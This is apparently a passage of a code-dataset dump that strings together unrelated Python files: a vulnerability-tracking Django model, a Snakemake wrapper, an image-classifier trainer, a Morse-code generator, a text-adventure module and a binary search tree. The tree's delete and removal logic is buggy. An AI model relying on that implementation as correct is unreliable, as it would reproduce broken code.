on_delete=models.CASCADE,)\n point = models.TextField('취약항목', default='', blank=True)\n found_date = models.DateField('등록일자', null=True, blank=True)\n is_reported = models.BooleanField('전달', default=False)\n reported_date = models.DateField('전달일자',null=True,blank=True)\n is_patched = models.BooleanField('조치확인', default=False)\n patched_date = models.DateField('조치확인일자', null=True,blank=True)\n is_new = models.BooleanField('신규여부(신규/기존)',default=True,)\n note = models.TextField('비고', blank=True, default='')\n\n class Meta:\n ordering = ['pk']\n ","repo_name":"zzado/flus-lite","sub_path":"backend/api/models/poc.py","file_name":"poc.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"69823712711","text":"import tempfile\nfrom snakemake.shell import shell\nfrom snakemake_wrapper_utils.java import get_java_opts\nfrom snakemake_wrapper_utils.base import WrapperBase\n\n\nclass Wrapper(WrapperBase):\n\n def __init__(self, snakemake) -> None:\n super().__init__(snakemake)\n\n def parser(self):\n # java options\n self.java_opts = get_java_opts(self.snakemake)\n self.log = self.snakemake.log_fmt_shell()\n\n bams = self.snakemake.input.bams\n if isinstance(bams, str):\n bams = [bams]\n self.bams = list(map(\"--INPUT {}\".format, bams))\n\n if self.snakemake.output.bam.endswith(\".cram\"):\n self.output = \"/dev/stdout\"\n if self.snakemake.params.embed_ref:\n view_options = \"-O cram,embed_ref\"\n else:\n view_options = \"-O cram\"\n self.convert = f\" | samtools view -@ {self.snakemake.threads} {view_options} \\\n --reference {self.snakemake.input.ref} -o {self.snakemake.output.bam}\"\n else:\n self.output = self.snakemake.output.bam\n self.convert = \"\"\n\n def run(self):\n with tempfile.TemporaryDirectory() as tmpdir:\n shell(\n \"(picard MarkDuplicates\" # Tool and its subcommand\n \" {self.java_opts}\" # Automatic java option\n \" {self.extra}\" # User defined parmeters\n \" {self.bams}\" # Input bam(s)\n \" --TMP_DIR {tmpdir}\"\n \" --OUTPUT {self.output}\" # Output bam\n \" --METRICS_FILE {self.snakemake.output.metrics}\" # Output metrics\n \" {self.convert} ) {self.log}\" # Logging\n )\n\n\nif __name__ == '__main__':\n Wrapper(snakemake)","repo_name":"dxsbiocc/Workflow","sub_path":"wrappers/picard/markduplicates/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"27"} +{"seq_id":"74629738951","text":"from tensorflow import keras\nimport tensorflow as tf\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.applications import EfficientNetB0\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nfrom tensorflow.python.client import device_lib\nimport os\nimport numpy as np\nfrom PIL import Image\nfrom datetime import datetime\nimport json\nfrom img_generator import ImageProcess\nfrom tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint\n# gpu name : /device:GPU:0\n\n\nclass EfficientNet:\n def __init__(self, epoch, batch_size, classes):\n self.epochs = epoch\n self.batch_size = batch_size\n self.classes = classes\n self.img_size = (224, 224)\n self.class_list = []\n os.environ['TF_XLA_FLAGS'] = '--tf_xla_enable_xla_devices'\n\n def training_model(self, train_ds, val_ds):\n device_lib.list_local_devices()\n tf.config.list_physical_devices('GPU')\n model = EfficientNetB0(include_top=True,\n weights=None,\n input_shape=(224, 224, 3),\n classes=self.classes,\n classifier_activation='softmax')\n\n model.compile(loss='sparse_categorical_crossentropy',\n optimizer=Adam(lr=0.00005),\n metrics=['acc'])\n\n save_name = str(datetime.today().year) + str(datetime.today().month) + str(datetime.today().day) + str(datetime.today().hour) + str(datetime.today().minute)\n es = EarlyStopping(monitor='val_loss', patience=5)\n mc = ModelCheckpoint(os.getcwd().replace('\\\\', '/') + '/save_model/ship_classfication_v' + save_name + '.h5', save_best_only=True)\n history = model.fit(train_ds,\n validation_data=val_ds,\n epochs=self.epochs,\n #batch_size=self.batch_size,\n callbacks=[es, mc])\n history_dict = history.history\n json.dump(history_dict, open(os.getcwd().replace('\\\\', '/') + '/acc_history/acc_history_v' + save_name + '.txt', 'w'))\n\n # class_list = os.listdir(os.getcwd().replace('\\\\', '/') + '/dataset/gen_img')\n _file = open(os.getcwd().replace('\\\\', '/') + '/class_history/class_history_v' + save_name + '.txt', 'w')\n for i in self.class_list:\n _file.write(i + '\\n')\n _file.close()\n\n def data_setting(self):\n base_path = os.getcwd().replace('\\\\', '/') + '/dataset/gen_img'\n # data_target = []\n # total_img_len = 0\n # ready_ship = os.listdir(base_path)\n # for i in range(self.classes):\n # ship_img_len = len(os.listdir(base_path + '/' + ready_ship[i] + '/'))\n # for k in range(ship_img_len):\n # data_target.append(i)\n # total_img_len = total_img_len + ship_img_len\n # data_target = np.array(data_target)\n # data_input = np.ndarray(shape=(total_img_len, 224, 224, 3), dtype=np.float32)\n # index = 0\n # image_size = (224, 224)\n # for i in ready_ship:\n # path = base_path + '/' + i + '/'\n # img_name = os.listdir(path)\n # for name in img_name:\n # image = Image.open(path + name)\n # image = image.resize((224, 224))\n # image = np.asarray(image)\n # image = image / 255.0\n # data_input[index] = image\n # index = index + 1\n # print('이미지 넣는중 {0}/{1}'.format(index, total_img_len))\n # train_input, test_input, train_target, test_target = train_test_split(data_input, data_target, test_size=0.2,\n # shuffle=True, stratify=data_target,\n train_ds = keras.preprocessing.image_dataset_from_directory(\n base_path,\n validation_split=0.2,\n subset='training',\n seed=123,\n image_size=self.img_size,\n batch_size=self.batch_size\n )\n val_ds = keras.preprocessing.image_dataset_from_directory(\n base_path,\n validation_split=0.2,\n subset='validation',\n seed=123,\n image_size=self.img_size,\n batch_size=self.batch_size\n )\n self.class_list = train_ds.class_names\n AUTOTUNE = tf.data.experimental.AUTOTUNE\n train_ds = train_ds.cache().shuffle(1000).prefetch(buffer_size=AUTOTUNE)\n val_ds = val_ds.cache().prefetch(buffer_size=AUTOTUNE)\n normalization_layer = keras.layers.experimental.preprocessing.Rescaling(1./255)\n normalized_ds = train_ds.map(lambda x, y: (normalization_layer(x), y))\n return normalized_ds, val_ds\n\n @staticmethod\n def draw_graph(filename):\n with open(os.getcwd().replace('\\\\', '/') + '/acc_history/'+filename, 'r') as json_file:\n data = json.load(json_file)\n acc = data['acc']\n val_acc = data['val_acc']\n loss = data['loss']\n val_loss = data['val_loss']\n\n epochs = range(len(acc))\n plt.figure(figsize=(100, 100))\n plt.subplot(211)\n plt.plot(epochs, acc, 'r', label='Training accuracy')\n plt.plot(epochs, val_acc, 'b', label='Validation accuracy')\n plt.title('Training and validation accuracy')\n plt.legend(loc=0)\n\n plt.subplot(212)\n plt.plot(epochs, loss, 'r', label='Training loss')\n plt.plot(epochs, val_loss, 'b', label='Validation loss')\n plt.title('Training and validation loss')\n plt.legend(loc=0)\n\n plt.show()\n\n @staticmethod\n def predict_ship(image_array, model_name, ship_list):\n ship_data = np.ndarray(shape=(1, 224, 224, 3), dtype=np.float32)\n ship_data[0] = image_array\n model = tf.keras.models.load_model(model_name, compile=False)\n prediction = model.predict(ship_data)\n print(len(prediction[0]))\n # idx = np.argmax(prediction[0])\n # result = '{0} -> {1:0.2f}%'.format(ship_list[idx], prediction[0][idx])\n arr = prediction[0].tolist()\n sorted_list = sorted(arr)\n first = sorted_list[-1]\n second = sorted_list[-2]\n third = sorted_list[-3]\n forth = sorted_list[-4]\n fifth = sorted_list[-5]\n first_index = arr.index(first)\n second_index = arr.index(second)\n third_index = arr.index(third)\n forth_index = arr.index(forth)\n fifth_index = arr.index(fifth)\n result = [ship_list[first_index], ship_list[second_index], ship_list[third_index], ship_list[forth_index], ship_list[fifth_index]]\n return result\n","repo_name":"KangJuSeong/Ship_Classification_Program","sub_path":"training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":6791,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"27055802829","text":"from PIL import Image\nimport os\n\ninital_file_path = \"/Users/espresso/Documents/Projects/SkinCAM/input/better-smaller-database\"\ndest_path = \"/Users/espresso/Documents/Projects/SkinCAM/input/cropped_database\"\n\ndef image_cropper(current_image_path, new_image_path, number):\n image = Image.open(current_image_path)\n center_width = (image.size[0]) / 2\n center_height = (image.size[1]) / 2\n\n new_image = image.crop((\n center_width - 50,\n center_height - 50,\n center_width + 50,\n center_height + 50\n ))\n \n new_image.save(new_image_path+\"/{}.jpg\".format(number))\n # print(new_image_path+\"/{}.jpg\".format(number))\n return None\n\ndef file_iterator(file_path, list_images): # NOTE: list_dir is a boolean\n doublList = []\n image_folder_dirs = os.listdir(file_path)# ; print(image_folder_dirs)\n image_folder_dirs.sort()\n image_folder_dirs.remove(\".DS_Store\") if \".DS_Store\" in image_folder_dirs else None # NOTE: keyword pass doesn't work in place of 1\n image_folder_dirs = [os.path.join(file_path, image_folder) for image_folder in image_folder_dirs]\n for folder_ind in range(len(image_folder_dirs)): #for folder in image_folder_dirs: ? - NO because I use 'i' in feed_dict={Y:i}\n os.chdir(image_folder_dirs[folder_ind])\n if list_images:\n image_names = os.listdir()\n image_names.remove(\".DS_Store\") if \".DS_Store\" in image_names else None\n image_dir_list = [os.path.join(os.getcwd(), file_name) for file_name in image_names]\n doublList.append(image_dir_list)\n os.chdir(\"..\")\n if list_images:\n return doublList\n else:\n return image_folder_dirs\n\nuncropped_loc_list = file_iterator(inital_file_path, True)\n# print(uncropped_loc_list)\ndest_path_list = file_iterator(dest_path, False)\n# print(\"\\n\", dest_path_list)\n\ncounter, celerculter = 0, 0\n\nfor uncropped_list in uncropped_loc_list:\n for uncroppped_image_path in uncropped_list:\n celerculter += 1\n # print(dest_path_list[counter])\n # print(uncroppped_image_path)\n # exit()\n # print(uncroppped_image_path)\n image_cropper(uncroppped_image_path, dest_path_list[counter], celerculter)\n counter += 1\n","repo_name":"hbg/skinCAM-Python","sub_path":"utils/crop.py","file_name":"crop.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"27942066183","text":"from models.seq2seq import Seq2Seq\nfrom modules import EncoderRNN, AttnDecoderRNN\n\nclass RnnAttentionS2S(Seq2Seq):\n\n def __init__(self, input_lang, output_lang, max_length, hidden_size=256, device='cpu'):\n encoder = EncoderRNN(input_lang.n_words, hidden_size, device).to(device)\n decoder = AttnDecoderRNN(hidden_size, output_lang.n_words, max_length, dropout_p=0.1, device=device).to(device)\n super().__init__(encoder, decoder, input_lang, output_lang, device)\n\n","repo_name":"maximecolignon/pam","sub_path":"models/rnn_attention_s2s.py","file_name":"rnn_attention_s2s.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"20286536187","text":"class BinarySearchTree:\n \"\"\"\n Property: Keys less than parent are found in the left tree, \n Keys greater than parent are found in the right tree.\n each subtree is a BST\n \"\"\"\n def __init__(self) -> None:\n self.root = None\n self.size = 0\n \n def length(self):\n return self.size\n \n def __len__(self):\n return self.size\n\n def __iter__(self):\n return self.root.__iter__()\n\n def put(self, key, val):\n if self.root:\n self._put(key,val,self.root)\n else:\n self.root = TreeNode(key, val)\n self.size += 1\n \n def _put(self, key, val, current_node):\n if key < current_node.key:\n if current_node.has_left_child():\n self._put(key, val, current_node.left_child)\n else:\n current_node.left_child = TreeNode(key, val, parent=current_node)\n else:\n if current_node.has_right_child():\n self._put(key, val, current_node.right_child)\n else:\n current_node.right_child = TreeNode(key, val, parent=current_node)\n \n def __setitem__(self, key, val):\n self.put(key, val)\n \n def get(self, key):\n if self.root:\n result = self._get(key, self.root)\n if result:\n return result.payload\n else:\n return None\n else:\n return None\n\n def _get(self, key, current_node):\n if not current_node:\n return None\n elif current_node.key == key:\n return current_node\n elif key < current_node.key:\n return self._get(key, current_node.left_child)\n else:\n return self._get(key, current_node.right_child)\n \n def __getitem__(self, key):\n return self.get(key=key)\n\n def __contains__(self, key):\n if self.get(key):\n return True\n else:\n return False\n \n def delete(self, key):\n if self.size > 1:\n node_to_delete = self.get(key)\n if node_to_delete:\n self.remove(node_to_delete)\n self.size -= 1\n else:\n raise KeyError(f\"Given key {key} not found in binary search tree.\")\n elif self.size == 1 and self.root.key == key:\n self.root = None\n self.size -= 1\n else:\n raise KeyError(f\"Given key {key} not found in binary search tree.\")\n\n def __delitem__(self, key):\n self.delete(key)\n\n def remove(self, node_to_remove):\n if node_to_remove.is_leaf():\n if node_to_remove.is_left_child():\n node_to_remove.parent.left_child = None\n else:\n node_to_remove.parent.right_child = None\n elif node_to_remove.has_both_children():\n succ = node_to_remove.find_successor()\n # Successor will be a node with 1 or zero children\n succ.splice_out()\n node_to_remove.key = succ.key\n node_to_remove.payload = succ.payload\n else:\n if node_to_remove.has_left_child():\n if node_to_remove.is_left_child():\n node_to_remove.left_child.parent = node_to_remove.parent\n node_to_remove.parent.left_child = node_to_remove.left_child\n elif node_to_remove.is_right_child():\n node_to_remove.left_child.parent = node_to_remove.parent\n node_to_remove.parent.right_child = node_to_remove.right_child\n else:\n node_to_remove.replace_node_data(\n node_to_remove.left_child.key,\n node_to_remove.left_child.payload,\n node_to_remove.left_child.left_child,\n node_to_remove.left_child.right_child,\n )\n else:\n if node_to_remove.is_left_child():\n node_to_remove.right_child.parent = node_to_remove.parent\n node_to_remove.parent.left_child = node_to_remove.right_child\n elif node_to_remove.is_right_child():\n node_to_remove.right_child.parent = node_to_remove.parent\n node_to_remove.parent.right_child = node_to_remove.right_child\n else:\n node_to_remove.replace_node_data(\n node_to_remove.right_child.key,\n node_to_remove.right_child.payload,\n node_to_remove.right_child.left_child,\n node_to_remove.right_child.right_child,\n )\n self.size -= 1\n\n \n def __str__(self) -> str:\n if self:\n for node in self.root:\n print(node)\n\n\n\nclass TreeNode:\n def __init__(self, key, val, left=None, right=None, parent=None, balance_factor=None) -> None:\n self.key = key\n self.payload = val\n self.left_child = left\n self.right_child = right\n self.parent = parent\n self.balance_factor = balance_factor\n \n def has_left_child(self):\n return self.left_child\n \n def has_right_child(self):\n return self.right_child\n \n def is_left_child(self):\n return (self.parent and self.parent.left_child == self)\n \n def is_right_child(self):\n return (self.parent and self.parent.right_child == self)\n \n def is_root(self):\n return not self.parent\n \n def is_leaf(self):\n return (not self.left_child and not self.right_child)\n \n def has_any_children(self):\n return self.left_child or self.right_child\n \n def has_both_children(self):\n return self.left_child and self.right_child\n \n def replace_node_data(self, key, val, lc, rc):\n self.key = key\n self.val = val\n self.left_child = lc\n self.right_child = rc\n if self.has_left_child:\n self.left_child.parent = self\n if self.has_right_child:\n self.right_child.parent = self\n\n def find_successor(self):\n successor = None\n if self.has_right_child():\n successor = self.right_child.find_min()\n else:\n if self.parent:\n if self.is_left_child():\n successor = self.parent\n else:\n self.parent.right_child = None\n successor = self.parent.find_successor()\n self.parent.right_child = self\n return successor\n \n def find_min(self):\n current = self\n while current.has_left_child():\n current = current.left_child\n return current\n \n def splice_out(self):\n if self.is_leaf():\n if self.is_left_child():\n self.parent.left_child = None\n else:\n self.parent.right_child = None\n else:\n if self.has_any_children():\n if self.has_left_child():\n if self.is_left_child():\n self.parent.left_child = self.left_child\n else:\n self.parent.right_child = self.left_child\n self.left_child.parent = self.parent\n else:\n if self.is_left_child():\n self.parent.left_child = self.right_child\n else:\n self.parent.right_child = self.right_child\n self.right_child.parent = self.parent\n\n def __iter__(self):\n if self:\n if self.has_left_child():\n for elem in self.left_child:\n yield elem\n yield self.key\n if self.has_right_child():\n for elem in self.right_child:\n yield elem\n\n\n\nif __name__ == \"__main__\":\n mytree = BinarySearchTree()\n mytree[3]=\"red\"\n mytree[4]=\"blue\"\n mytree[6]=\"yellow\"\n mytree[2]=\"black\"\n\n print(mytree)","repo_name":"dileepkr/datastructures","sub_path":"ds_trees/bst.py","file_name":"bst.py","file_ext":"py","file_size_in_byte":8038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72407777352","text":"#!/usr/bin/env python3\nfrom argparse import ArgumentParser, FileType\nimport csv\nimport itertools\nimport math\nimport random\nimport struct\n\nimport wave\n\nSAMPWIDTH = 2 # 16-bit audio\n\nCHARS = {\n 'a': '.-',\n 'b': '-...',\n 'c': '-.-.',\n 'd': '-..',\n 'e': '.',\n 'f': '..-.',\n 'g': '--.',\n 'h': '....',\n 'i': '..',\n 'j': '.---',\n 'k': '-.-',\n 'l': '.-..',\n 'm': '--',\n 'n': '-.',\n 'o': '---',\n 'p': '.--.',\n 'q': '--.-',\n 'r': '.-.',\n 's': '...',\n 't': '-',\n 'u': '..-',\n 'v': '...-',\n 'w': '.--',\n 'x': '-..-',\n 'y': '-.--',\n 'z': '--..',\n '0': '-----',\n '1': '.----',\n '2': '..---',\n '3': '...--',\n '4': '....-',\n '5': '.....',\n '6': '-....',\n '7': '--...',\n '8': '---..',\n '9': '----.',\n ' ': ' ',\n ',': '--..--',\n '?': '..--..',\n '.': '.-.-.-',\n }\n\ndef normalise_char(char):\n if char.isspace():\n return ' '\n return char.lower()\n\ndef normalise_special_characters(char):\n from unidecode import unidecode\n return unidecode(char)\n\ndef char_to_cw(char, normalise):\n if normalise:\n char = normalise_special_characters(char)\n char = normalise_char(char)\n\n return CHARS[char]\n\ndef cycle_n(xs, n):\n length = len(xs)\n periods = math.floor(n / length)\n rest = n - periods * length\n return periods * xs + xs[:rest]\n\ndef sine_wave(frequency, duration, frame_rate=44100, amplitude=0.5):\n period = int(frame_rate / frequency)\n amp = min(max(amplitude, 0.0), 1.0)\n lookup_table = [amplitude *\n math.sin(2.0 * math.pi * frequency * (i%period) / frame_rate)\n for i in range(period)]\n\n return cycle_n(lookup_table, int(duration * frame_rate / 1000))\n\ndef noise_generator(kind, duration, frame_rate=44100, amplitude=0.5):\n from acoustics.generator import noise\n samples = noise(frame_rate, kind)\n samples = [s / 5 * amplitude for s in samples]\n\n return cycle_n(samples, int(duration * frame_rate / 1000))\n\ndef mix(*signals):\n return map(sum, zip(*signals))\n\nclass CWGenerator:\n def __init__(self,\n wpm,\n min_wpm,\n max_wpm,\n length_standard_deviation=0.0,\n length_drift=0.0,\n normalise_special_characters=False):\n self.wpm = wpm\n self.min_wpm = min_wpm\n self.max_wpm = max_wpm\n self.length_standard_deviation = length_standard_deviation\n self.length_drift = length_drift\n self.normalise_special_characters = normalise_special_characters\n\n def dot_length(self):\n length = math.floor(1200 / self.wpm)\n dev = length * self.length_standard_deviation\n length = max(0, min(max(length - dev, random.gauss(length, dev)), length + dev))\n return length\n\n def dash_length(self):\n return 3 * self.dot_length()\n\n def _produce_char(self, char):\n elems = char_to_cw(char, self.normalise_special_characters)\n i = 0\n for elem in elems:\n if elem == '.':\n yield (True, self.dot_length())\n elif elem == '-':\n yield (True, self.dash_length())\n elif elem == ' ':\n yield (False, self.dot_length() * 1)\n i += 1\n if i < len(elems):\n yield (False, self.dot_length())\n yield (False, self.dash_length())\n\n def drift(self):\n drift = random.gauss(1.0, self.length_drift)\n drift = min(max(drift, 1 - self.length_drift), 1 + self.length_drift)\n self.wpm *= drift\n if self.min_wpm is not None: self.wpm = max(self.min_wpm, self.wpm)\n if self.max_wpm is not None: self.wpm = min(self.max_wpm, self.wpm)\n\n def _produce(self, string):\n for char in string:\n yield from self._produce_char(char)\n self.drift()\n\n def produce(self, string):\n _on = False\n _duration = 0\n for on, duration in self._produce(string):\n if _on != on:\n if _duration != 0:\n yield (_on, _duration)\n _on = on\n _duration = 0\n _duration += duration\n if _on != False:\n yield (_on, _duration)\n\ndef generate_wav(stream, frame_rate=44100, frequency=600,\n noise_kind=None, noise_level=0.0):\n max_amp = int(2 ** (8 * SAMPWIDTH - 1)) - 1\n\n audio = []\n length = 0\n for on, duration in stream:\n audio.append(sine_wave(\n frequency=frequency,\n duration=duration,\n frame_rate=frame_rate,\n amplitude=0.5 * max_amp if on else 0.0))\n length += duration\n audio = [a for parts in audio for a in parts]\n if noise_level > 0.0:\n noise = noise_generator(\n noise_kind,\n length,\n frame_rate,\n noise_level * max_amp)\n audio = mix(audio, noise)\n audio = list(map(int, audio))\n frames = struct.pack('{0:d}h'.format(len(audio)), *audio)\n\n return frames\n\ndef main():\n parser = ArgumentParser(\n description='Generate CW (morse code) audio files from text')\n\n g_files = parser.add_argument_group('Input/Output')\n g_input = g_files.add_mutually_exclusive_group(required=True)\n g_input.add_argument('--text', '-t',\n help='Text to convert to morse code')\n g_input.add_argument('--input', '-i', type=FileType('r'),\n help='Read text from this file')\n g_files.add_argument('--wave', '-w', type=FileType('wb'),\n help='Write WAVE output to this file')\n g_files.add_argument('--frame-rate', type=int, default=22050,\n help='Frame rate in Hz (default: 22050)')\n g_files.add_argument('--csv', type=FileType('w'),\n help='Write CSV output to this file')\n g_files.add_argument('--quiet', '-q', action='store_true',\n help='Be more quiet')\n g_files.add_argument('--play', '-p', action='store_true',\n help='Playback')\n\n g_gen = parser.add_argument_group('CW Generation')\n g_gen.add_argument('--normalise-special-characters', '-c', action='store_true',\n help='Normalise special characters, like á to a')\n g_gen.add_argument('--frequency', '-f', type=int, default=600,\n help='Tone frequency in Hz (default: 600)')\n g_gen.add_argument('--wpm', '-s', type=int, default=12,\n help='Initial speed in WPM (default: 12)')\n g_gen.add_argument('--max-wpm', type=int, default=None,\n help='Maximum speed in WPM (default: none)')\n g_gen.add_argument('--min-wpm', type=int, default=None,\n help='Minimum speed in WPM (default: none)')\n g_gen.add_argument('--length-standard-deviation', '-d', type=float, default=0.0,\n help='Standard deviation from dotlength, '\n 'relative to the dot length (default: 0.0; sensible: < 0.2)')\n g_gen.add_argument('--length-drift', '-D', type=float, default=0.0,\n help='Speed drift (default: 0.0; suggested: 0.02)')\n\n g_noise = parser.add_argument_group('Noise Generation')\n g_noise.add_argument('--noise-kind', '-N', type=str, default='pink',\n help='Noise kind (default: pink; other values: white, blue, brown, violet)')\n g_noise.add_argument('--noise-level', '-n', type=float, default=0.0,\n help='Add noise with this amplitude (0 <= a <= 1; default: 0)')\n\n args = parser.parse_args()\n\n if not args.quiet:\n print('cwgen.py Copyright (C) 2018 Camil Staps')\n print('This program comes with ABSOLUTELY NO WARRANTY.')\n print('This is free software, and you are welcome to redistribute it under certain conditions.')\n print('See the LICENSE file for details.')\n\n gen = CWGenerator(\n wpm=args.wpm,\n min_wpm=args.min_wpm,\n max_wpm=args.max_wpm,\n length_standard_deviation=args.length_standard_deviation,\n length_drift=args.length_drift,\n normalise_special_characters=args.normalise_special_characters)\n\n if args.text is not None:\n text = args.text\n elif args.input is not None:\n text = args.input.read()\n stream = list(gen.produce(text))\n\n if args.csv is not None:\n wr = csv.writer(args.csv)\n for on, duration in stream:\n wr.writerow([1 if on else 0, int(duration)])\n\n if args.wave is not None or args.play:\n frames = generate_wav(stream, args.frame_rate, args.frequency,\n args.noise_kind, args.noise_level)\n\n if args.wave is not None:\n wav = wave.open(args.wave)\n wav.setnchannels(1)\n wav.setsampwidth(SAMPWIDTH)\n wav.setframerate(args.frame_rate)\n wav.writeframes(frames)\n if args.play:\n import pyaudio\n player = pyaudio.PyAudio()\n player = player.open(\n format=player.get_format_from_width(SAMPWIDTH),\n channels=1,\n rate=args.frame_rate,\n output=True)\n try:\n block_size = int(args.frame_rate / 4)\n while len(frames) > 0:\n data = frames[:block_size]\n frames = frames[block_size:]\n player.write(data)\n except KeyboardInterrupt:\n pass\n\nif __name__ == '__main__':\n main()\n","repo_name":"camilstaps/cwgen.py","sub_path":"cwgen.py","file_name":"cwgen.py","file_ext":"py","file_size_in_byte":9386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"16569442975","text":"def check(ls):\n if(len(ls[0]) != len(ls[1])):\n return \"NO\"\n dic = {}\n for i in ls[0]:\n dic[i] = dic.get(i, 0) + 1\n for i in ls[1]:\n dic[i] = dic.get(i, 0) - 1\n for i in dic.keys():\n if dic[i] != 0:\n return \"NO\"\n return \"YES\"\n\n\nfor t in range(int(input())):\n words = input().split()\n print(check(words))\n","repo_name":"734mh4rdc0d3/GeeksForGeeks-Must-Do-Programming-","sub_path":"Strings/07/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"26537375167","text":"import matplotlib.pyplot as plt\nimport csv\n\nx = []\ny = []\nwith open(\"first_touch_channel_customer_visited.csv\", \"r\") as csvfile:\n has_header = csv.Sniffer().has_header(csvfile.read(1024))\n csvfile.seek(0) \n plots = csv.reader(csvfile, delimiter = ',')\n #print(plots)\n if has_header:\n next(plots) # Skip header row.\n\n for row in plots:\n #print(row)\n x.append(row[0])\n y.append(int(row[1]))\n\n#plt.subplots_adjust(bottom=0.30)\n#plt.xticks(rotation = 70)\nplt.pie(y,labels = x, autopct = '%.2f%%')\nplt.title('Customers Visited From Channels (First Touch)')\nplt.legend()\nplt.show()\n","repo_name":"techiebro18/python-works","sub_path":"Charts/first_touch_channel_customer_visited.py","file_name":"first_touch_channel_customer_visited.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"3412550760","text":"import gameplay\nfrom core_elements import *\nfrom typing import List\n\n# DEFINES BASIC LOGICS FOR ELEMENTS AND ITEMS\n\n\nclass Element(object):\n '''\n CLASS used for all interactable elements on the game.\n '''\n\n def __init__(self, name, description):\n self.name: str = name\n self.description: str = description\n # self.looking_effect: str = None\n # self.searching_effect: List[str] = None\n # self.on_hearing = None\n # self.hearing_effect: str = None\n # self.on_touching = None\n # self.touching_effect: str = None\n # self.on_tasting = None\n # self.tasting_effect: str = None\n\n @property\n def article(self) -> str:\n if self.name.endswith('s') or self.name.endswith('food'):\n return ('', '')\n elif self.name.startswith(('a', 'e', 'i', 'o', 'u', 'y')):\n return ('an ', 'an ')\n else:\n return ('a ', 'a ')\n\n @property\n def verb(self) -> str:\n if self.name.endswith('s') or self.name.endswith('food'):\n return 'are'\n else:\n return 'is'\n\n def on_looking(self) -> None:\n '''\n If the place looked upon has visible elements (ej. apples on trees),\n the items are added to the elements List of the Scenario instance and can now be also interacted to with.\n Hidden elements should be on a Container and are only found with on_searching.\n '''\n things_saw: List = []\n\n for __item in gameplay.CURRENT_SCENARIO.elements:\n if issubclass(type(__item), Item):\n if __item.container == self.name:\n things_saw.append(__item)\n\n if len(things_saw) == 1:\n this_element = things_saw[0]\n print_cinematics(\n f'You see {this_element.article[0]}{this_element.name} on the {self.name}')\n elif len(things_saw) > 1:\n print_cinematics(\n f'You see \\\n {\", \".join(f\"{this_element.article[0]}{this_element.name}\" for item in things_saw[: -1])} \\\n and {f\"{things_saw[-1].article[0]}{things_saw[-1].name}\"} on the {self.name}.')\n\n for property_name, property_value in self.__dict__.items():\n if issubclass(type(property_value), Item) or type(property_value) == Item:\n if property_value.hidden == False:\n if not property_name in gameplay.CURRENT_SCENARIO.elements:\n print_cinematics(\n f'You see {property_value.name} on the {self.name}')\n gameplay.CURRENT_SCENARIO.add_to_elements(\n property_value)\n delattr(self, property_name)\n break\n\n def on_taking(self, callback=None) -> None:\n '''\n called when Hero takes an item with on_taking attribute.\n '''\n if callback:\n callback()\n\n\nclass Item(Element):\n '''\n CLASS used exclusively for items that can be taken and/or used by the Hero.\n '''\n\n def __init__(self, name: str, description: str, weight: int, quantity: int = 1):\n super(Item, self).__init__(name, description)\n self.usable: bool = False\n self.container: str = None\n self.hidden: bool = False\n self.unity_weight: int = weight\n self.__quantity: int = quantity\n self.weight: int = weight * quantity\n\n @property\n def verb(self) -> str:\n if type(self) == Food:\n if self.__quantity <= 1 and not self.name.endswith('food'):\n return 'look'\n else:\n return 'looks'\n else:\n if self.__quantity <= 1:\n return 'is'\n else:\n return 'are'\n\n def add(self, how_many: int = 'countless') -> int:\n if how_many == 'countless':\n self.on_taking = lambda: 'keep'\n self.__quantity = 1\n self.name += 's'\n self.weight = self.unity_weight * self.__quantity\n else:\n self.__quantity += how_many\n self.update_quantity()\n return (self.__quantity)\n\n def remove(self, how_many: int):\n self.__quantity -= how_many\n self.update_quantity()\n return (self.__quantity)\n\n def update_quantity(self) -> None:\n self.weight = self.unity_weight * self.__quantity\n if self.__quantity <= 1 and not self.name.endswith('food'):\n if self.name[-1] == 's':\n self.name = self.name[:-1]\n elif self.__quantity > 1 and not self.name.endswith('food'):\n if self.name[-1] != 's':\n self.name = f'{self.name}s'\n self.verb\n\n @property\n def quantity(self) -> int:\n return self.__quantity\n\n\nclass Container(Element):\n '''\n CLASS used exclusively for elements that contain another elements (ej. a chest).\n '''\n\n def __init__(self, name: str, description: str):\n super(Container, self).__init__(name, description)\n\n def add_item(self, item: Item, hidden: str = None) -> None:\n if hidden == 'hidden':\n item.hidden = True\n setattr(item, 'container', self.name)\n setattr(self, item.name, item)\n\n def on_searching(self) -> None:\n '''\n If the place looked upon has hidden items,\n they are added to the Scenario instance and can now be also interacted to with.\n Visible items are not found here with on_serching, but seen with on_looking.\n '''\n if getattr(self, 'searching_effect', None):\n print_cinematics(self.searching_effect[0])\n self.searching_effect[1]()\n\n for property_name, property_value in self.__dict__.items():\n\n if issubclass(type(property_value), Item) and property_value.hidden == True:\n property_value.hidden = False\n print_cinematics(f'You find {property_value.name}')\n gameplay.CURRENT_SCENARIO.add_to_elements(property_value)\n delattr(self, property_name)\n return\n print_cinematics(\n f'You search the {self.name} but you find nothing special.')\n\n\nclass Food(Item):\n\n def __init__(self, name: str, description: str, weight: int, quantity: int = 0):\n self.description: str = description\n super(Food, self).__init__(name, self.description, weight, quantity)\n self.usable: bool = True\n\n\nclass Weapon(Item):\n '''\n CLASS used exclusively for Weapons.\n '''\n\n def 